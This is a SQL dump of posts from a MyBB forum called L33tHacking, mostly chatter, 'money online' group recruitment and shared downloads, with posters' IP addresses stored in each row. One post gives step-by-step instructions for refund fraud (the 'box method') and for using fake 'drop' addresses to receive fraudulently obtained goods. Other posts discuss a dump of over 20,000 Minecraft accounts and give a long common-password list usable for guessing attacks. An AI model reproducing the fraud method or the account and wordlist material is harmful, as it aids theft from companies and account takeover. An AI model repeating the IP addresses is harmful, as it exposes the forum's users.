'1', '0', '0', '0', '1', '705abb99232dde2a3e9799079619bb5d', '0', '0'); INSERT INTO mybb_posts VALUES('6368', '1095', '6354', '8', 'RE: Azz & Tittiez', '0', '205', 'mothered', '1351167973', 'I also like their other song called \"It\'s a fight\", which was featured In Rocky 6 (the final fight).\r\n\r\nNice contribution.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '2682cb992f890ef537dbb06d55c08d83', '0', '0'); INSERT INTO mybb_posts VALUES('6369', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '62', 'R?????zo?', '1351168993', '[b]Username:[/b] R?????zo?\r\n[b]Age:[/b] 20\r\n[b]Is your English spelling/grammar good?: [/b]Yes, even though it\'s my 2nd language.\r\n[b]How many Experience do you have with making money online?:[/b] Nearly 1year.\r\n[b]What for methods do you use?:[/b] Lately PPD and PPC :/\r\n[b]Do you succeed more than you fail, or not?:[/b] I usually succed, but I\'ve failed before (who didn\'t)\r\n[b]Explain Why you want to join the group:[/b] I\'d like to learn some more about monetizing online and of course help/share some methods.\r\n[b]Profile Link:[/b] http://l33thacking.net/user-62.html', '89.214.9.182', '1507199414', '1', '0', '0', '0', '1', 'c068353ca0191c8734ef256d7cb37ed1', '0', '0'); INSERT INTO mybb_posts VALUES('6370', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '53', 'sirchamp', '1351174019', 'thanks for the link. But stop it with these link shortening shite.', '218.142.131.26', '-628194534', '1', '0', '0', '0', '1', 'd4bfc31a8f8bc2c3047e61cf0c3be190', '0', '0'); INSERT INTO mybb_posts VALUES('6371', '1094', '6369', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351177002', '[quote=\'R?????zo?\' pid=\'6369\' dateline=\'1351168993\']\r\n[b]Username:[/b] R?????zo?\r\n[b]Age:[/b] 20\r\n[b]Is your English spelling/grammar good?: [/b]Yes, even though it\'s my 2nd language.\r\n[b]How many Experience do you have with making money online?:[/b] Nearly 1year.\r\n[b]What for methods do you use?:[/b] Lately PPD and PPC :/\r\n[b]Do you succeed more than you fail, or not?:[/b] I usually succed, but I\'ve failed before (who didn\'t)\r\n[b]Explain Why you want to join the group:[/b] I\'d like to learn some more about monetizing online and of course help/share some methods.\r\n[b]Profile Link:[/b] http://l33thacking.net/user-62.html\r\n[/quote]\r\n Welcome To the Group Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '147af6358ac874d20b7a30ec21399e73', '0', '0'); INSERT INTO mybb_posts VALUES('6372', '1076', '6297', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '61', 'NXK', '1351178958', '[quote=\'iTzIpod\' pid=\'6297\' dateline=\'1351118410\']\nNevermind. Just downloaded it, scanned with MalwareBytes, and got no malicious items.\nThanks! :D\nInstalled all of them.\n[/quote]\n\n.. They\'re fonts. No need for a virus scan.', '99.252.235.12', '1677519628', '1', '0', '61', '1351179031', '1', 'b294c2d741339ebfa5cfb3f96a00e74d', '0', '1351179031'); INSERT INTO mybb_posts VALUES('6373', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '258', 'PiXEL^OG', '1351182513', 'THIS . IS . AWESOME!!! Thanks for this epic pack <3', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '873216339ca5611885012099bafa01b6', '0', '0'); INSERT INTO mybb_posts VALUES('6374', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '62', 'R?????zo?', '1351183322', 'Thanks for accepting me\n:)', '5.43.42.33', '86714913', '1', '0', '0', '0', '1', 'bc286840222facee88a6740fd0995c93', '0', '0'); INSERT INTO mybb_posts VALUES('6375', '1098', '0', '9', 'CPA Headhunters - Learn How To Make Bank', '0', '228', 'VirtualLegend', '1351192844', '[align=center][img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part1.png[/img]\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part2.png[/img]\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part3.png[/img]\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part4.png[/img]\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/05/juni1.png[/img]\r\n[size=medium][color=#FF0000]So what is here for you?[/color][/size]\r\n\r\nA complete blueprint video course over my shoulder that will show you exactly how do I work to make a killing with CPA.\r\n\r\nThis video course is based on 10 modules. Each module has from 1-3 videos.\r\n\r\nI have also included 2 bonus moduels for you to give you more ideas, and a new income stream. \r\n\r\nNewbie Friendly System Step-By-Step.\r\nMaster a New Traffic Source.\r\nMake 100%-400% ROI.\r\nLow Competition (CPC range $0.03-$0.10).\r\nStart Advertising With as Low as $25.\r\nFind a Winner Campaign For $5 Testing.\r\nUse Direct Linking Or Landing Page.\r\nInstant ads approval ( No More Struggle )\r\nLearn How To Optimize & Scale Your Campaigns.\r\nEmail and Skype Support.\r\nMuch, Much More.\r\n\r\n[color=#FF0000][size=medium]Please Don\'t buy if you are:[/size][/color]\r\n- Not going to take action\r\n- Feel that this course is not for you\r\n- Afraid of losing money\r\n- Also if this is your last money, because I don\'t want to take your last dime\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part6.png[/img]\r\n[img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part5.png[/img][/align]\r\n\r\n[code]https://www.dropbox.com/sh/pf5beplnhgppvn1/j5V4NID6pa[/code]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9566755d2936c318446cbd9637fd8b20', '0', '0'); INSERT INTO mybb_posts VALUES('6376', '1084', '6311', '4', 'RE: hey guys', '0', '82', 'iTzIpod', '1351197376', 'Welcome to L33tHacking! :) Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b7005b7e214284db10d9ab3bc238e80', '0', '0'); INSERT INTO mybb_posts VALUES('6377', '1098', '6375', '9', 'RE: CPA Headhunters - Learn How To Make Bank', '0', '62', 'R?????zo?', '1351197440', 'Thanks for this, looks great.\nDownloading and will check it out later.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '428e1290638254c6bca164422fbaaebe', '0', '0'); INSERT INTO mybb_posts VALUES('6378', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351197691', 'Pssh. It\'s kinda LQ (Some of the threads and posts) Like for example the thread names from Trey...\nI don\'t like the fact that his grammar and spelling is bad. \nI told him countless times to fix it and he\'s like\n\"okay.\"\nWithout starting with a capital O for \"Okay\" or whatsoever.\n-.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a29ece4d22d9d9702b7f4834bdbfb7a', '0', '0'); INSERT INTO mybb_posts VALUES('6379', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1351197735', 'Check out the recruitment thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cbdcf572e9ce02ad691c4982cd973f78', '0', '0'); INSERT INTO mybb_posts VALUES('6380', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '82', 'iTzIpod', '1351197785', 'I don\'t really need this. \n\nBut I\'ll try to refer some members.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88d7e9e0feb94f5338390778b02938f8', '0', '0'); INSERT INTO mybb_posts VALUES('6381', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351197815', '1/10. Kinda hard to read.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '602a4ad34f90184ec34dca181a09e83a', '0', '0'); INSERT INTO mybb_posts VALUES('6382', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351197885', '@VirtualLegend they\'re accounts are working. Try like the accounts on the first page. Some of them work. I tried it.\nBut no one can change the password or email since the Security Questions are unknown', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56b1b9aa231f38a2c9d3a1e5c9ba4e54', '0', '0'); INSERT INTO mybb_posts VALUES('6383', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '82', 'iTzIpod', '1351197922', 'I don\'t really like the idea. \n\nKinda like the Off Topic Section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '93c4d323fb7fd918b440b2c6d33f33da', '0', '0'); INSERT INTO mybb_posts VALUES('6384', '1096', '6357', '7', 'RE: Leaked e-book', '0', '82', 'iTzIpod', '1351198001', 'Change the title to what it\'s about.\nAdd some proof that it\'s not infected. \n(Download it and provide a Virus Scan)\nAdd a picture with a Notepad program active and the eBook name etc. And on the Notepad make it say L33tHacking.net XxTREYZxX\n/Request Closed/Junked.\nLQ post. OP is really LQ too... :/', '24.212.197.164', '416597412', '1', '0', '82', '1351198032', '1', 'fb97bc1dfc6406a5ac9060f1d912b129', '0', '1351198032'); INSERT INTO mybb_posts VALUES('6385', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '82', 'iTzIpod', '1351198100', 'Posting... Waiting for the advertisement to finish. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '051a11bc17a1bf3e29fa069ad9555aa2', '0', '0'); INSERT INTO mybb_posts VALUES('6386', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '82', 'iTzIpod', '1351198461', '[b]Username:[/b] iTzIpod\n[b]Age:[/b] 13\n[b]Is your English spelling/grammar good?: [/b] Yes. (Better than TREYZ) -.-\n[b]How many Experience do you have with making money online?:[/b] Not much. It\'s even. \n[b]What for methods do you use?:[/b] Pay per click and PPD\n[b]Do you succeed more than you fail, or not?:[/b] I made $12 using my niche today. ($12/day I guess) Usually 50 cents a day on PPC\n[b]Explain Why you want to join the group:[/b] I want to join the Marketers group because then I can share my methods and learn from other\'s methods and all.\n[b]Profile Link:[/b] http://l33thacking.net/user-82.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5ec81200824b6e040c3a4539038cf1a', '0', '0'); INSERT INTO mybb_posts VALUES('6387', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '2', 'Apathy', '1351203361', 'And he used to be a crip. So props to him for helping a police officer.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '99e7737db9b49a0014cca621239d2efc', '0', '0'); INSERT INTO mybb_posts VALUES('6388', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '222', 'Exposé', '1351204937', '[b]Username:[/b] Exposé\n[b]Age:[/b] 18\n[b]Is your English spelling/grammar good?: [/b] Online I don\'t give a fuck, but I\'m a great writer.\n[b]How many Experience do you have with making money online?:[/b] I have tons of experience making money online, inlucluding GPT\'s, advertising networks, SE\'ing, ebay, etc.\n[b]What for methods do you use?:[/b] SE\'ing and GPT\n[b]Do you succeed more than you fail, or not?:[/b] I win bitch...failing is for pussies\n[b]Explain Why you want to join the group:[/b] Because I probably make more than any of you online and deserve to be in the group. And I can share some of my methods here aswell\n[b]Profile Link:[/b]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ed7d3452932645a33505f441e6ab0644', '0', '0'); INSERT INTO mybb_posts VALUES('6389', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351206869', 'Yeah you dont have to download it guys because i dont know how to do a virus scan :P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'b9b30a34a1ae19e9ff3746658209853e', '0', '0'); INSERT INTO mybb_posts VALUES('6390', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351207056', '0/10 because its broken and there is no pic \"P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'c6d5a5be35cb9fecc5f697d3a279ec01', '0', '0'); INSERT INTO mybb_posts VALUES('6391', '861', '6378', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1351207372', '[quote=\'iTzIpod\' pid=\'6378\' dateline=\'1351197691\']\r\nPssh. It\'s kinda LQ (Some of the threads and posts) Like for example the thread names from Trey...\r\nI don\'t like the fact that his grammar and spelling is bad. \r\nI told him countless times to fix it and he\'s like\r\n\"okay.\"\r\nWithout starting with a capital O for \"Okay\" or whatsoever.\r\n-.-\r\n[/quote]\r\n\r\nI have fixed my grammar you just haven\'t noticed :S', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '10ab355ec8de0557fb701fc8836acb8a', '0', '0'); INSERT INTO mybb_posts VALUES('6392', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '82', 'iTzIpod', '1351212377', 'Download it. Use your AntiVirus program to scan it for any viruses or so. And done.\nPost results.\n\nOr, download it.\nGo on virustotal.com\nAnd then upload the file.\nAnd scan it. Post link\nAnd done.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e107b64280954a871cbf1c3e3e932dc', '0', '0'); INSERT INTO mybb_posts VALUES('6393', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351212430', 'What are you talking about?\n\nI see my avatar all the time I post. It\'s never broken.\n\n[img]http://i.imgur.com/kQFf9.png?dateline=1345558891[/img]\n\nhttp://i.imgur.com/kQFf9.png?dateline=1345558891\n\nThere ^\n\nStill, rate is 1/10 for your avatar', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8b830b625985fb1e2a0e547cfcff258', '0', '0'); INSERT INTO mybb_posts VALUES('6394', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351212519', 'Really? I checked my PMs numerous times and checked some of your posts. Most of them don\'t start with a capital nor have any apostrophes or whatnot.. Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adecc56558992c0937b500283e96052f', '0', '0'); INSERT INTO mybb_posts VALUES('6395', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '82', 'iTzIpod', '1351212578', 'I gotta give him props for doing that heroic action. That body slam was like that uppercut. Lol (Ohio Bus Driver Uppercut thingy)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd310f53e1c15dc73a6cf1b6658478f38', '0', '0'); INSERT INTO mybb_posts VALUES('6396', '1093', '6341', '7', 'RE: I\'m back', '0', '1', 't3h jok3r', '1351214906', 'Unfortunately every time you logged in you were on a VPN so I can\'t unban you unless you log on with your real IP or send me your IP through PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '292e8e297f6795321065df31f11fabd5', '0', '0'); INSERT INTO mybb_posts VALUES('6397', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '7', 'Romdu62', '1351215477', 'Brave guy. This proves that there\'s still humanity left.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '48ced9e578e20e0d02e64e0faa7b23fd', '0', '0'); INSERT INTO mybb_posts VALUES('6398', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '7', 'Romdu62', '1351215549', 'I like the suggestion will keep things organized.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8c9fe3c10af4ec1db0107c540361b2ed', '0', '0'); INSERT INTO mybb_posts VALUES('6399', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '7', 'Romdu62', '1351215596', 'K & i\'m checking profiles daily. You can change the products for money.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '11f7e8bea79cc5fd710ef799cf463cad', '0', '0'); INSERT INTO mybb_posts VALUES('6400', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '7', 'Romdu62', '1351216084', 'I disagree with the pringles one. When I was new and I used the same exact reason (I just didn\'t say that I was a gamer). They said they are sorry for the inconvenience and they will try to make sure all their future products are in good condition.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2952bfdb96ce351a7e80b7cfc2063064', '0', '0'); INSERT INTO mybb_posts VALUES('6401', '1099', '0', '16', 'Box Method and Drop Explained', '0', '7', 'Romdu62', '1351216534', '[u][b]Box Method[/b][/u] : When you are asked to send it in the product back to the company but since you don\'t have it you use the box method. You print out the conversation and put it in a box, beat the shit out of it but don\'t make it look too bad. Then put tape around it then put it into another box. Put something like salt and make a small hole so it has some weight and by the time it reaches the company it becomes empty. Call back the company after a week asking what happened to your replacement. They will say that it was empty say that you sent the product.\r\n\r\n[u][b]Drop[/b][/u] Drop is a fake location that you use to get your SE\'d items. For example you SE\'d a laptop and you don\'t want the delivery to happen at your house so you use fake location most likely a empety house around or something. Stay by the door or act like you are leaving when postmail covers.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '80fab85ed9c31b2be24cf5e03b646e7e', '0', '0'); INSERT INTO mybb_posts VALUES('6402', '1100', '0', '42', '895 passwords not to use.', '0', '7', 'Romdu62', '1351217077', 'Here\'s a list of the most common passwords so i recommend not to use them.\r\n\r\n[code]\r\nminecraft\r\npassword\r\n12345\r\npassport\r\ndiablo\r\nalpha\r\n12345678\r\n1\r\nzxcvbnm\r\ntrustno1\r\nshit\r\nmonkey\r\nhello\r\nelite\r\nabc123\r\nwindows\r\nthunder\r\nthomas\r\ntherock\r\nsony\r\nrobert\r\nrandom\r\nqwerty\r\nqazwsx\r\npresario\r\npiff\r\npierre\r\npeace\r\npana\r\nninja\r\nmusic\r\nmike\r\nmichael\r\nmenace\r\nmaster\r\nmaria\r\nletmein\r\nlemmein\r\njericho\r\njamesbond\r\nhacker\r\nfuckyou\r\nfrogfrog\r\nfish\r\neminem\r\ndragons\r\ndantheman\r\nbuster\r\nbrooklyn\r\nbodhisattva\r\nblue\r\nblowme\r\nbeebop\r\nbean21\r\nbaseball\r\n666666\r\n485112\r\n187187\r\n1234\r\n1134\r\n11111111\r\nzzzzzz\r\nzilch\r\nzerocool\r\nzapatista\r\nzahra\r\nz3r0\r\nyumes\r\nyoyo\r\nyo\r\nyellow\r\nxyz\r\nxxxxxxxx\r\nxwings\r\nxuser\r\nxtc\r\nwutang\r\nwunder\r\nwouter1\r\nworthless\r\nwonder\r\nwinnie\r\nwinhex\r\nwindwalker\r\nwillie\r\nwilliam\r\nwildman\r\nwildcard\r\nwild\r\nwhore\r\nwhizzkids\r\nwhatever1\r\nwhatever\r\nwetwilly\r\nweed\r\nwebcam1\r\nwaterloo\r\nwarzone\r\nwarez\r\nwantto\r\nwankers\r\nwallace\r\nvt\r\nvoodoo\r\nvette1\r\nvalentine\r\nusagi\r\nunregistered\r\nunion\r\nunderdog\r\nuffaaa\r\ntyphoon\r\ntyler2\r\nty98\r\ntwf\r\ntusse\r\nturky\r\nturbo\r\ntuesday\r\ntruk\r\ntroubles\r\ntrottel\r\ntrinitron\r\ntricia44\r\ntricia\r\ntribute\r\ntribe\r\ntoshiba\r\ntoad\r\ntippy\r\ntikki\r\ntigger\r\ntif\r\nthree\r\ntherock1\r\nthend\r\nthemaster\r\nthedog\r\nthatisit\r\nthailand\r\ntesttest\r\ntermite\r\nterblo\r\ntemp\r\ntelephone\r\nteacher1\r\ntartarus\r\ntalon6\r\ntalamar\r\ntaju\r\ntaboo1\r\nsword\r\nsurfing\r\nsurfer22\r\nsuperman\r\nsunflower\r\nsuckit\r\nsublime\r\nstumptown\r\nstuffies\r\nstinky\r\nsteven\r\nstefan\r\nsquaresoft\r\nsquare\r\nspyderco\r\nspug\r\nspongebob\r\nspikerip\r\nsourcecode\r\nsofie\r\nsmokey\r\nsmith\r\nsmigul\r\nslovenia\r\nslipknot\r\nslampa\r\nskar23\r\nsithlord\r\nsingle1\r\nsindy28\r\nsinder\r\nsimple\r\nsilverwing\r\nsiberia\r\nshortcut\r\nshithead\r\nshibboleth\r\nshiatsu\r\nshearer9\r\nshareef\r\nshaolin\r\nshaft\r\nshadow\r\nseymour\r\nseven\r\nsemperfi\r\nsekhmet\r\nseifer\r\nsecurity\r\nsebastian\r\nse7en\r\nscooter\r\nscooby\r\nschumacher\r\nschiess\r\nsbbut\r\nsatire\r\nsatan\r\nsane\r\nsandman\r\nsanderson\r\nsamuel\r\nsame\r\nsambuca\r\nsadbuttrue\r\nsabina\r\ns3cr3t\r\ns1mpl3\r\nroze\r\nrootbeer\r\nromece\r\nrockstar\r\nroberto\r\nrobbie\r\nrevilo\r\nrentrap\r\nrellik\r\nreliable\r\nrelena\r\nreimann\r\nregister\r\nredwater\r\nreddragon\r\nredbull\r\nredalert\r\nreaver\r\nraza\r\nraytel\r\nrayann\r\nrawnewdlz\r\nrawiswar\r\nravens\r\nrascal\r\nrapture\r\nraptor17\r\nrapalA\r\nrannug\r\nrani\r\nrandhir\r\nrambo\r\nrainman\r\nrainbow\r\nrain\r\nradioactive\r\nradio7\r\nradar\r\nrachel\r\nqwertyuiop\r\nqwertyui\r\nqwerty23\r\nqwaszx\r\nqqw\r\nqazwsxedc\r\nq1w2e3\r\npussy\r\nprowler\r\nprovost\r\npredator\r\npppp\r\npowers\r\npowell\r\nposer\r\npoop\r\npomme\r\npoiuytrewq\r\npoiuytre\r\nplop\r\nplease\r\nplaystation\r\nplat\r\npitbull\r\npitagoras\r\npimpin\r\npillow\r\npilgrim\r\nphunky\r\nphreek\r\nphoenix\r\nphilly\r\nphate\r\npharma\r\npgpgpg\r\npeterla\r\npeterb\r\nperfect\r\npepon\r\npennys\r\npeewee\r\npeebee\r\npeaches\r\npeach\r\npasswd\r\nparham\r\nparanoid\r\nparadise\r\npantera6\r\npadraig\r\nozzy\r\nowell\r\noverride\r\noralia\r\noquendo\r\nopenit\r\noliver\r\noldenberg\r\nnumber1\r\nnoway\r\nnothing\r\nnono\r\nnone\r\nnobody\r\nnn3\r\nninnin\r\nnilsson\r\nnikolas\r\nnikita\r\nnihongo\r\nnightnight\r\nnexus6\r\nnewnew\r\nnewdog\r\nnewbee\r\nnevernever\r\nnermy\r\nneontrain\r\nnenga\r\nnedkelly\r\nnbb\r\nnayaran\r\nnaxos\r\nnavyseal\r\nnautilus\r\nnadia\r\nn2deep\r\nn0ne\r\nmystery\r\nmushki\r\nmowers\r\nmoviestar\r\nmovies\r\nmotocross\r\nmoshi\r\nmoscow\r\nmoose\r\nmoon\r\nmoney\r\nmommy\r\nmommom\r\nmoltar\r\nmoloch\r\nmmoshi\r\nmitabrev\r\nmiriam\r\nmind\r\nmidgar\r\nmichelle\r\nmetoo\r\nmember\r\nmelody\r\nmelo1977\r\nmeathead\r\nmaxell\r\nmattp\r\nmatrix\r\nmathers\r\nmary\r\nmarley\r\nmarisol\r\nmanutd\r\nmangie\r\nmamma\r\nmakeitso\r\nmagic1\r\nmaggie1\r\nlulop\r\nlowlow\r\nlove\r\nlouise\r\nlopez\r\nlooga\r\nlong\r\nlogjam\r\nlocks\r\nliquor\r\nlionking4\r\nlionheart\r\nlinux\r\nlimpbizkit\r\nlilian1\r\nlightsabre\r\nlightning\r\nlexmark\r\nlenong\r\nlemon\r\nlautrec\r\nlasher\r\nlansing\r\nlanparty\r\nlancaster\r\nladybug\r\nkyle11\r\nkut\r\nkuffs\r\nkrap\r\nkookies\r\nkompas\r\nkodecypher\r\nkoalabear\r\nkmp80\r\nkitty\r\nkitten\r\nkirin\r\nkingking\r\nkima\r\nkiller1\r\nkiller\r\nkewin\r\nkenner\r\nkcampbell\r\nkatrina\r\nkate\r\nkameler\r\nkamari\r\nkaizers\r\njulie\r\njujai\r\njstevens\r\njoris\r\njonah\r\njon\r\njollyrogers\r\njojojo\r\njohn\r\njoe\r\njimboy\r\njhi\r\njester\r\njessica\r\njeremy\r\njennifer\r\njenn\r\njbull\r\njaybee\r\njaws\r\njavert\r\njasper\r\njasonl\r\nizzy\r\nivanaj\r\nitisme\r\nireland\r\ninstinct\r\ninsane\r\ninnovision\r\ninlove\r\ninimulli\r\nimzadi\r\niloveyou\r\nih\r\niforgot\r\nidontknow\r\nidiot\r\niamgod\r\nhunter\r\nhuh\r\nhugo\r\nhubert\r\nhop\r\nhonor\r\nhonda\r\nhomes\r\nhomerjay\r\nholly\r\nhockey\r\nhmb\r\nhitman\r\nhilda\r\nhightimes\r\nhi\r\nhelpme\r\nhelena\r\nheineken\r\nhehehe\r\nhawley\r\nhatred\r\nhardcore\r\nhappy\r\nhappiness\r\nhanging\r\nhandle\r\nhalflife\r\nhak95\r\nhacking\r\nhackhack\r\nhackers\r\ngyros\r\nguy\r\ngustavo\r\ngunshot\r\ngundam\r\nguitar\r\ngrynn\r\ngreenday\r\ngreen\r\ngreece\r\ngrassroots\r\ngoogle\r\ngoldfish\r\ngoldberg\r\ngloria\r\nglasaal\r\ngive\r\ngirl\r\nginger\r\ngibson\r\nget316\r\ngeorge\r\ngenesis\r\ngator\r\ngateway\r\ngangster\r\ngandalf\r\ngamma\r\ngaming\r\nfuzzball\r\nfuguz\r\nfuckyoutoo\r\nfuckoff\r\nfucker\r\nfront242\r\nfreshmeat\r\nfreedom1\r\nfreedom\r\nfrederik\r\nfreddie\r\nfrasse\r\nfoxman\r\nflywheel\r\nflames\r\nfireman\r\nffffff\r\nfelix\r\nfear\r\nfatboy\r\nfart\r\nfantasy\r\nfallenangel\r\nfaith\r\nfairmont\r\nfabrizio\r\neyes\r\nexploit\r\nevil1\r\neu86t\r\netherton\r\nestelle\r\neroica\r\nenterprise\r\nenigma\r\nelitist\r\nelf1\r\nelement\r\nelegance\r\nedwards\r\neat\r\neaglescout\r\ndumbass\r\nduck\r\ndrsmith\r\ndrowssap\r\ndrevil\r\ndrdre\r\ndraziw\r\ndragonfly\r\ndoritos\r\ndoom\r\ndoggys\r\nditu\r\ndisowned\r\ndingle\r\ndimension\r\ndiglet\r\ndick\r\ndiablo2\r\ndeville\r\nders1\r\ndefault\r\ndeejay\r\ndecent\r\ndeath\r\ndeadman\r\ndbzdbz\r\ndavy\r\ndavid1\r\ndartagnan\r\ndarkdog\r\ndark\r\ndanny20\r\ndalgas\r\ndabomb\r\ncszwed\r\ncstrike\r\ncrystalscan\r\ncrystal\r\ncricket\r\ncrepitus\r\ncrashand\r\ncrappo\r\ncrapper\r\ncrap\r\ncrackers\r\ncows\r\ncow\r\ncoushin\r\ncourtney\r\ncosmo\r\ncorsair\r\ncorinna\r\ncooldude\r\ncoold\r\ncool\r\ncontinuim\r\ncomputer1\r\ncomputer\r\ncolleen\r\ncoffman\r\ncodetracker\r\ncobra\r\nclent\r\nclaudius\r\nclark\r\ncisco123\r\ncimbom\r\nchristophe1\r\nchilli\r\nchessino\r\nchefchef\r\nchazz1\r\nchatter1\r\nchange\r\nchampion\r\nchamp\r\nchallenger\r\nccsf\r\nccccc\r\ncc\r\ncathy\r\ncarter\r\ncarnival\r\ncaramba\r\ncandy\r\ncanada\r\ncambridge\r\ncamaro\r\ncaliente\r\ncafer\r\ncacca\r\nby8540\r\nbutthead\r\nbutterfly1\r\nbutterfly\r\nbusto\r\nburt\r\nburritos\r\nbugsfix\r\nbudale\r\nbuba\r\nbroman\r\nbrittany\r\nbrian\r\nbrenda\r\nbreanna\r\nbrazil\r\nbrambles\r\nbottle\r\nboston\r\nbonzie\r\nboll\r\nbobos\r\nbobby\r\nblueberries\r\nblubb\r\nblitz\r\nblahblah\r\nbitterwoo\r\nbirchard\r\nbimbo1\r\nbiggame\r\nbible\r\nbibbob\r\nbeta\r\nbertje\r\nbenbob\r\nbellix\r\nbecks\r\nbear\r\nbathroom\r\nbanzai\r\nbandit\r\nbailey\r\nbadass\r\nb16a1\r\nawed\r\naviation\r\navatar\r\nauscam\r\nauckland\r\nathlon\r\nasterix\r\nast\r\nasskicker\r\nasker\r\nasinat\r\narchdevils\r\nanonymous\r\nangels\r\nanfernee\r\nandyb\r\nandrea\r\nanders\r\nanarchy1\r\namirman\r\namireal1\r\nalthea\r\nalpha1\r\nalisha\r\nalien\r\nali\r\nalexande\r\nalbino\r\nairplane\r\naffinity\r\nadolf\r\nadios\r\nadam04\r\nacheron\r\naceman\r\nacef\r\nabide\r\nabcda\r\naaaaaa\r\nZZZZZ\r\nTrisha\r\nTetris\r\nTULLE\r\nTROY\r\nTRITON\r\nTHEROCK\r\nScorpions72\r\nSambrook\r\nSAMUEL\r\nSAMSUNG\r\nRoland\r\nRedwings\r\nQwerty\r\nPaulan1\r\nPaul19\r\nPROTON\r\nPRIMITIVE\r\nMillenium\r\nMelvin\r\nMERT\r\nLarsLars\r\nJonathan\r\nHotties\r\nHanibal\r\nHUNTER\r\nGoop\r\nGodsent\r\nFugazi\r\nDragon\r\nDigital\r\nCyres\r\nCyber\r\nCowboyBebop\r\nCentauri\r\nCaspar\r\nCORNER\r\nBerliner\r\nBearfoot\r\nAnnemarie\r\n99999\r\n987654321\r\n9770\r\n975384\r\n9177\r\n898989\r\n895623\r\n8816\r\n822822\r\n811820\r\n800070\r\n786110\r\n7777\r\n777\r\n741235\r\n74123\r\n71380\r\n64897\r\n6148\r\n61284\r\n55dflw\r\n545937\r\n523470\r\n486570\r\n48469\r\n4462\r\n4402020\r\n437782\r\n350450\r\n3425283\r\n33305\r\n314159\r\n31337\r\n2cool4u\r\n29385098\r\n284812\r\n280472\r\n261127\r\n25802580\r\n25101986\r\n24911\r\n24\r\n2353535\r\n2320111\r\n23\r\n2227\r\n2222\r\n220587\r\n2203\r\n2132\r\n2122\r\n2040\r\n2000\r\n1spyder\r\n1qaz\r\n1q2w3e\r\n1izznit\r\n1QAZ\r\n19840824\r\n1984\r\n1977\r\n1969\r\n183461\r\n180155\r\n1782\r\n170120\r\n164810\r\n159951\r\n1568\r\n1547\r\n1488\r\n14807\r\n147896\r\n1340lu\r\n1313\r\n123ccc\r\n123789\r\n1234566\r\n123123\r\n123\r\n122782\r\n122386\r\n120981\r\n120973\r\n114182\r\n112358\r\n112233\r\n111222\r\n101183\r\n090284\r\n072160\r\n062\r\n05071984\r\n0502\r\n0411\r\n027702\r\n022367\r\n019210\r\n011386\r\n007\r\n0009\r\n0000\r\n00\r\n[/code]',